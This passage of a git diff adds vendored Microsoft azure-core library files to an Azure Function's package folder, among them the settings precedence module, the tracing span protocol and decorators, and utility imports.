_unset) + wrapper_class = get_wrapper_class() # type: Union[None, _Unset, Type[AbstractSpan]] + if wrapper_class is _unset: + raise ValueError( + "Cannot convert {} to AbstractSpan, valid values are: {}".format( + value, ", ".join(_tracing_implementation_dict) + ) + ) + return wrapper_class + + +class PrioritizedSetting(object): + """Return a value for a global setting according to configuration precedence. + + The following methods are searched in order for the setting: + + 4. immediate values + 3. previously user-set value + 2. environment variable + 1. system setting + 0. implicit default + + If a value cannot be determined, a RuntimeError is raised. + + The ``env_var`` argument specifies the name of an environment to check for + setting values, e.g. ``"AZURE_LOG_LEVEL"``. + + The optional ``system_hook`` can be used to specify a function that will + attempt to look up a value for the setting from system-wide configurations. + + The optional ``default`` argument specified an implicit default value for + the setting that is returned if no other methods provide a value. + + A ``convert`` agument may be provided to convert values before they are + returned. For instance to concert log levels in environment variables + to ``logging`` module values. + + """ + + def __init__(self, name, env_var=None, system_hook=None, default=_Unset, convert=None): + + self._name = name + self._env_var = env_var + self._system_hook = system_hook + self._default = default + self._convert = convert if convert else lambda x: x + self._user_value = _Unset + + def __repr__(self): + # type () -> str + return "PrioritizedSetting(%r)" % self._name + + def __call__(self, value=None): + # type: (Any) -> Any + """Return the setting value according to the standard precedence. + + :param time: value + :type time: str or int or float or None (default: None) + :returns: the value of the setting + :rtype: str or int or float + :raises: RuntimeError + + """ + + # 4. immediate values + if value is not None: + return self._convert(value) + + # 3. previously user-set value + if self._user_value is not _Unset: + return self._convert(self._user_value) + + # 2. environment variable + if self._env_var and self._env_var in os.environ: + return self._convert(os.environ[self._env_var]) + + # 1. system setting + if self._system_hook: + return self._convert(self._system_hook()) + + # 0. implicit default + if self._default is not _Unset: + return self._convert(self._default) + + raise RuntimeError("No configured value found for setting %r" % self._name) + + def __get__(self, instance, owner): + return self + + def __set__(self, instance, value): + self.set_value(value) + + def set_value(self, value): + # type: (Any) -> None + """Specify a value for this setting programmatically. + + A value set this way takes precedence over all other methods except + immediate values. + + :param time: a user-set value for this setting + :type time: str or int or float + :returns: None + + """ + self._user_value = value + + def unset_value(self): + # () -> None + """Unset the previous user value such that the priority is reset.""" + self._user_value = _Unset + + @property + def env_var(self): + return self._env_var + + @property + def default(self): + return self._default + + +class Settings(object): + """Settings for globally used Azure configuration values. + + You probably don't want to create an instance of this class, but call the singleton instance: + + .. code-block:: python + + from azure.common.settings import settings + settings.log_level = log_level = logging.DEBUG + + The following methods are searched in order for a setting: + + 4. immediate values + 3. previously user-set value + 2. environment variable + 1. system setting + 0. implicit default + + An implicit default is (optionally) defined by the setting attribute itself. + + A system setting value can be obtained from registries or other OS configuration + for settings that support that method. + + An environment variable value is obtained from ``os.environ`` + + User-set values many be specified by assigning to the attribute: + + .. code-block:: python + + settings.log_level = log_level = logging.DEBUG + + Immediate values are (optionally) provided when the setting is retrieved: + + .. code-block:: python + + settings.log_level(logging.DEBUG()) + + Immediate values are most often useful to provide from optional arguments + to client functions. If the argument value is not None, it will be returned + as-is. Otherwise, the setting searches other methods according to the + precedence rules. + + Immutable configuration snapshots can be created with the following methods: + + * settings.defaults returns the base defaultsvalues , ignoring any environment or system + or user settings + + * settings.current returns the current computation of settings including prioritizatiom + of configuration sources, unless defaults_only is set to True (in which case the result + is identical to settings.defaults) + + * settings.config can be called with specific values to override what settings.current + would provide + + .. code-block:: python + + # return current settings with log level overridden + settings.config(log_level=logging.DEBUG) + + :cvar log_level: a log level to use across all Azure client SDKs (AZURE_LOG_LEVEL) + :type log_level: PrioritizedSetting + :cvar tracing_enabled: Whether tracing should be enabled across Azure SDKs (AZURE_TRACING_ENABLED) + :type tracing_enabled: PrioritizedSetting + :cvar tracing_implementation: The tracing implementation to use (AZURE_SDK_TRACING_IMPLEMENTATION) + :type tracing_implementation: PrioritizedSetting + + :Example: + + >>> import logging + >>> from azure.core.settings import settings + >>> settings.log_level = logging.DEBUG + >>> settings.log_level() + 10 + + >>> settings.log_level(logging.WARN) + 30 + + """ + + def __init__(self): + self._defaults_only = False + + @property + def defaults_only(self): + """Whether to ignore environment and system settings and return only base default values. + + :rtype: bool + """ + return self._defaults_only + + @defaults_only.setter + def defaults_only(self, value): + self._defaults_only = value + + @property + def defaults(self): + """Return implicit default values for all settings, ignoring environment and system. + + :rtype: namedtuple + """ + props = {k: v.default for (k, v) in self.__class__.__dict__.items() if isinstance(v, PrioritizedSetting)} + return self._config(props) + + @property + def current(self): + """Return the current values for all settings. + + :rtype: namedtuple + """ + if self.defaults_only: + return self.defaults + return self.config() + + def config(self, **kwargs): + """ Return the currently computed settings, with values overridden by parameter values. + + Examples: + + .. code-block:: python + + # return current settings with log level overridden + settings.config(log_level=logging.DEBUG) + + """ + props = {k: v() for (k, v) in self.__class__.__dict__.items() if isinstance(v, PrioritizedSetting)} + props.update(kwargs) + return self._config(props) + + def _config(self, props): # pylint: disable=no-self-use + Config = namedtuple("Config", list(props.keys())) + return Config(**props) + + log_level = PrioritizedSetting( + "log_level", env_var="AZURE_LOG_LEVEL", convert=convert_logging, default=logging.INFO + ) + + tracing_enabled = PrioritizedSetting( + "tracing_enbled", env_var="AZURE_TRACING_ENABLED", convert=convert_bool, default=False + ) + + tracing_implementation = PrioritizedSetting( + "tracing_implementation", env_var="AZURE_SDK_TRACING_IMPLEMENTATION", convert=convert_tracing_impl, default=None + ) + + +settings = Settings() +"""The settings unique instance. + +:type settings: Settings +""" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__init__.py new file mode 100644 index 0000000..d130aae --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__init__.py @@ -0,0 +1,9 @@ +# ------------------------------------ +# Copyright (c) Microsoft Corporation. +# Licensed under the MIT License. +# ------------------------------------ +from azure.core.tracing._abstract_span import AbstractSpan, SpanKind, HttpSpanMixin, Link + +__all__ = [ + "AbstractSpan", "SpanKind", "HttpSpanMixin", "Link" +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..909f639 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc new file mode 100644 index 0000000..3412092 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/_abstract_span.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/common.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/common.cpython-39.pyc new file mode 100644 index 0000000..727d8d9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/common.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator.cpython-39.pyc new file mode 100644 index 0000000..dbc313c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc new file mode 100644 index 0000000..a6e28c7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/__pycache__/decorator_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/_abstract_span.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/_abstract_span.py new file mode 100644 index 0000000..9bd2b68 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/_abstract_span.py @@ -0,0 +1,247 @@ +# ------------------------------------ +# Copyright (c) Microsoft Corporation. +# Licensed under the MIT License. +# ------------------------------------ +"""Protocol that defines what functions wrappers of tracing libraries should implement.""" +from enum import Enum + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import Any, Sequence, Dict, Optional, Union, Callable, ContextManager + + from azure.core.pipeline.transport import HttpRequest, HttpResponse, AsyncHttpResponse + HttpResponseType = Union[HttpResponse, AsyncHttpResponse] + AttributeValue = Union[ + str, + bool, + int, + float, + Sequence[str], + Sequence[bool], + Sequence[int], + Sequence[float], + ] + Attributes = Optional[Dict[str, AttributeValue]] + +try: + from typing_extensions import Protocol +except ImportError: + Protocol = object # type: ignore + + +class SpanKind(Enum): + UNSPECIFIED = 1 + SERVER = 2 + CLIENT = 3 + PRODUCER = 4 + CONSUMER = 5 + INTERNAL = 6 + + +class AbstractSpan(Protocol): + """Wraps a span from a distributed tracing implementation.""" + + def __init__(self, span=None, name=None, **kwargs): # pylint: disable=super-init-not-called + # type: (Optional[Any], Optional[str], Any) -> None + """ + If a span is given wraps the span. Else a new span is created. + The optional arguement name is given to the new span. + """ + + def span(self, name="child_span", **kwargs): + # type: (Optional[str], Any) -> AbstractSpan + """ + Create a child span for the current span and append it to the child spans list. + The child span must be wrapped by an implementation of AbstractSpan + """ + + @property + def kind(self): + # type: () -> Optional[SpanKind] + """Get the span kind of this span. + + :rtype: SpanKind + """ + + @kind.setter + def kind(self, value): + # type: (SpanKind) -> None + """Set the span kind of this span.""" + + def __enter__(self): + """Start a span.""" + + def __exit__(self, exception_type, exception_value, traceback): + """Finish a span.""" + + def start(self): + # type: () -> None + """Set the start time for a span.""" + + def finish(self): + # type: () -> None + """Set the end time for a span.""" + + def to_header(self): + # type: () -> Dict[str, str] + """ + Returns a dictionary with the header labels and values. + """ + + def add_attribute(self, key, value): + # type: (str, Union[str, int]) -> None + """ + Add attribute (key value pair) to the current span. + + :param key: The key of the key value pair + :type key: str + :param value: The value of the key value pair + :type value: str + """ + + def set_http_attributes(self, request, response=None): + # type: (HttpRequest, Optional[HttpResponseType]) -> None + """ + Add correct attributes for a http client span. + + :param request: The request made + :type request: HttpRequest + :param response: The response received by the server. Is None if no response received. + :type response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse + """ + + def get_trace_parent(self): + # type: () -> str + """Return traceparent string. + + :return: a traceparent string + :rtype: str + """ + + @property + def span_instance(self): + # type: () -> Any + """ + Returns the span the class is wrapping. + """ + + @classmethod + def link(cls, traceparent, attributes=None): + # type: (str, Attributes) -> None + """ + Given a traceparent, extracts the context and links the context to the current tracer. + + :param traceparent: A string representing a traceparent + :type traceparent: str + """ + + @classmethod + def link_from_headers(cls, headers, attributes=None): + # type: (Dict[str, str], Attributes) -> None + """ + Given a dictionary, extracts the context and links the context to the current tracer. + + :param headers: A dictionary of the request header as key value pairs. + :type headers: dict + """ + + @classmethod + def get_current_span(cls): + # type: () -> Any + """ + Get the current span from the execution context. Return None otherwise. + """ + + @classmethod + def get_current_tracer(cls): + # type: () -> Any + """ + Get the current tracer from the execution context. Return None otherwise. + """ + + @classmethod + def set_current_span(cls, span): + # type: (Any) -> None + """ + Set the given span as the current span in the execution context. + """ + + @classmethod + def set_current_tracer(cls, tracer): + # type: (Any) -> None + """ + Set the given tracer as the current tracer in the execution context. + """ + + @classmethod + def change_context(cls, span): + # type: (AbstractSpan) -> ContextManager + """Change the context for the life of this context manager. + + :rtype: contextmanager + """ + + @classmethod + def with_current_context(cls, func): + # type: (Callable) -> Callable + """Passes the current spans to the new context the function will be run in. + + :param func: The function that will be run in the new context + :return: The target the pass in instead of the function + :rtype: callable + """ + +# https://github.com/python/mypy/issues/5837 +if TYPE_CHECKING: + _MIXIN_BASE = AbstractSpan +else: + _MIXIN_BASE = object + + +class HttpSpanMixin(_MIXIN_BASE): + """Can be used to get HTTP span attributes settings for free. + """ + _SPAN_COMPONENT = "component" + _HTTP_USER_AGENT = "http.user_agent" + _HTTP_METHOD = "http.method" + _HTTP_URL = "http.url" + _HTTP_STATUS_CODE = "http.status_code" + + def set_http_attributes(self, request, response=None): + # type: (HttpRequest, Optional[HttpResponseType]) -> None + """ + Add correct attributes for a http client span. + + :param request: The request made + :type request: HttpRequest + :param response: The response received by the server. Is None if no response received. + :type response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse + """ + self.kind = SpanKind.CLIENT + self.add_attribute(self._SPAN_COMPONENT, "http") + self.add_attribute(self._HTTP_METHOD, request.method) + self.add_attribute(self._HTTP_URL, request.url) + user_agent = request.headers.get("User-Agent") + if user_agent: + self.add_attribute(self._HTTP_USER_AGENT, user_agent) + if response and response.status_code: + self.add_attribute(self._HTTP_STATUS_CODE, response.status_code) + else: + self.add_attribute(self._HTTP_STATUS_CODE, 504) + +class Link(object): + """ + This is a wrapper class to link the context to the current tracer. + :param headers: A dictionary of the request header as key value pairs. + :type headers: dict + :param attributes: Any additional attributes that should be added to link + :type attributes: dict + """ + def __init__(self, headers, attributes=None): + # type: (Dict[str, str], Attributes) -> None + self.headers = headers + self.attributes = attributes diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/common.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/common.py new file mode 100644 index 0000000..3298050 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/common.py @@ -0,0 +1,110 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# -------------------------------------------------------------------------- +"""Common functions shared by both the sync and the async decorators.""" +from contextlib import contextmanager +import warnings + +from ._abstract_span import AbstractSpan +from ..settings import settings + + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import Any, Optional, Union, Callable, List, Type, Generator + + +__all__ = [ + 'change_context', + 'with_current_context', +] + + +def get_function_and_class_name(func, *args): + # type: (Callable, List[Any]) -> str + """ + Given a function and its unamed arguments, returns class_name.function_name. It assumes the first argument + is `self`. If there are no arguments then it only returns the function name. + + :param func: the function passed in + :type func: callable + :param args: List of arguments passed into the function + """ + try: + return func.__qualname__ + except AttributeError: + if args: + return "{}.{}".format(args[0].__class__.__name__, func.__name__) # pylint: disable=protected-access + return func.__name__ + +@contextmanager +def change_context(span): + # type: (Optional[AbstractSpan]) -> Generator + """Execute this block inside the given context and restore it afterwards. + + This does not start and ends the span, but just make sure all code is executed within + that span. + + If span is None, no-op. + + :param span: A span + :type span: AbstractSpan + :rtype: contextmanager + """ + span_impl_type = settings.tracing_implementation() # type: Type[AbstractSpan] + if span_impl_type is None or span is None: + yield + else: + try: + with span_impl_type.change_context(span): + yield + except AttributeError: + # This plugin does not support "change_context" + warnings.warn('Your tracing plugin should be updated to support "change_context"', DeprecationWarning) + original_span = span_impl_type.get_current_span() + try: + span_impl_type.set_current_span(span) + yield + finally: + span_impl_type.set_current_span(original_span) + + +def with_current_context(func): + # type: (Callable) -> Any + """Passes the current spans to the new context the function will be run in. + + :param func: The function that will be run in the new context + :return: The func wrapped with correct context + :rtype: callable + """ + span_impl_type = settings.tracing_implementation() # type: Type[AbstractSpan] + if span_impl_type is None: + return func + + return span_impl_type.with_current_context(func) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator.py new file mode 100644 index 0000000..32dea50 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator.py @@ -0,0 +1,93 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# -------------------------------------------------------------------------- +"""The decorator to apply if you want the given function traced.""" + +import functools + +from typing import Callable, Any, TypeVar, overload +from typing_extensions import ParamSpec +from .common import change_context, get_function_and_class_name +from . import SpanKind as _SpanKind +from ..settings import settings + + +P = ParamSpec("P") +T = TypeVar("T") + + +@overload +def distributed_trace(__func: Callable[P, T]) -> Callable[P, T]: + pass + + +@overload +def distributed_trace( # pylint:disable=function-redefined + **kwargs: Any, # pylint:disable=unused-argument +) -> Callable[[Callable[P, T]], Callable[P, T]]: + pass + + +def distributed_trace( # pylint:disable=function-redefined + __func: Callable[P, T] = None, **kwargs: Any +): + """Decorator to apply to function to get traced automatically. + + Span will use the func name or "name_of_span". + + :param callable func: A function to decorate + :keyword name_of_span: The span name to replace func name if necessary + :paramtype name_of_span: str + :keyword kind: The kind of the span. INTERNAL by default. + :paramtype kind: ~azure.core.tracing.SpanKind + """ + name_of_span = kwargs.pop("name_of_span", None) + tracing_attributes = kwargs.pop("tracing_attributes", {}) + kind = kwargs.pop("kind", _SpanKind.INTERNAL) + + def decorator(func: Callable[P, T]) -> Callable[P, T]: + @functools.wraps(func) + def wrapper_use_tracer(*args: Any, **kwargs: Any) -> T: + merge_span = kwargs.pop("merge_span", False) + passed_in_parent = kwargs.pop("parent_span", None) + + span_impl_type = settings.tracing_implementation() + if span_impl_type is None: + return func(*args, **kwargs) + + # Merge span is parameter is set, but only if no explicit parent are passed + if merge_span and not passed_in_parent: + return func(*args, **kwargs) + + with change_context(passed_in_parent): + name = name_of_span or get_function_and_class_name(func, *args) + with span_impl_type(name=name, kind=kind) as span: + for key, value in tracing_attributes.items(): + span.add_attribute(key, value) + return func(*args, **kwargs) + + return wrapper_use_tracer + + return decorator if __func is None else decorator(__func) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator_async.py new file mode 100644 index 0000000..c25b1c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/decorator_async.py @@ -0,0 +1,94 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# -------------------------------------------------------------------------- +"""The decorator to apply if you want the given function traced.""" + +import functools + +from typing import Awaitable, Callable, Any, TypeVar, overload +from typing_extensions import ParamSpec +from .common import change_context, get_function_and_class_name +from . import SpanKind as _SpanKind +from ..settings import settings + +P = ParamSpec("P") +T = TypeVar("T") + + +@overload +def distributed_trace_async( + __func: Callable[P, Awaitable[T]] +) -> Callable[P, Awaitable[T]]: + pass + + +@overload +def distributed_trace_async( # pylint:disable=function-redefined + **kwargs: Any, # pylint:disable=unused-argument +) -> Callable[[Callable[P, Awaitable[T]]], Callable[P, Awaitable[T]]]: + pass + + +def distributed_trace_async( # pylint:disable=function-redefined + __func: Callable[P, Awaitable[T]] = None, **kwargs: Any +): + """Decorator to apply to function to get traced automatically. + + Span will use the func name or "name_of_span". + + :param callable func: A function to decorate + :keyword name_of_span: The span name to replace func name if necessary + :paramtype name_of_span: str + :keyword kind: The kind of the span. INTERNAL by default. + :paramtype kind: ~azure.core.tracing.SpanKind + """ + name_of_span = kwargs.pop("name_of_span", None) + tracing_attributes = kwargs.pop("tracing_attributes", {}) + kind = kwargs.pop("kind", _SpanKind.INTERNAL) + + def decorator(func: Callable[P, Awaitable[T]]) -> Callable[P, Awaitable[T]]: + @functools.wraps(func) + async def wrapper_use_tracer(*args: Any, **kwargs: Any) -> T: + merge_span = kwargs.pop("merge_span", False) + passed_in_parent = kwargs.pop("parent_span", None) + + span_impl_type = settings.tracing_implementation() + if span_impl_type is None: + return await func(*args, **kwargs) + + # Merge span is parameter is set, but only if no explicit parent are passed + if merge_span and not passed_in_parent: + return await func(*args, **kwargs) + + with change_context(passed_in_parent): + name = name_of_span or get_function_and_class_name(func, *args) + with span_impl_type(name=name, kind=kind) as span: + for key, value in tracing_attributes.items(): + span.add_attribute(key, value) + return await func(*args, **kwargs) + + return wrapper_use_tracer + + return decorator if __func is None else decorator(__func) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..55ea8c7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__init__.py new file mode 100644 index 0000000..a01db18 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__init__.py @@ -0,0 +1,37 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" + +This `utils` module provides functionality that is intended to be used by developers +building on top of `azure-core`. + +""" +from ._connection_string_parser import ( + parse_connection_string +) +from ._utils import case_insensitive_dict + +__all__ = ["parse_connection_string", "case_insensitive_dict"] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..5a39258 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc new file mode 100644 index 0000000..0a26e82 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc new file mode 100644 index 0000000..8857eaa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc new file mode 100644 index 0000000..b2102e4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc new file mode 100644 index 0000000..c9427e5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_utils.cpython-39.pyc new file mode 100644 index 0000000..93cc91c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_connection_string_parser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_connection_string_parser.py new file mode 100644 index 0000000..ce78598 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_connection_string_parser.py @@ -0,0 +1,46 @@ +# coding=utf-8 +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +from typing import Mapping + + +def parse_connection_string(conn_str, case_sensitive_keys=False): + # type: (str, bool) -> Mapping[str, str] + """Parses the connection string into a dict of its component parts, with the option of preserving case + of keys, and validates that each key in the connection string has a provided value. If case of keys + is not preserved (ie. 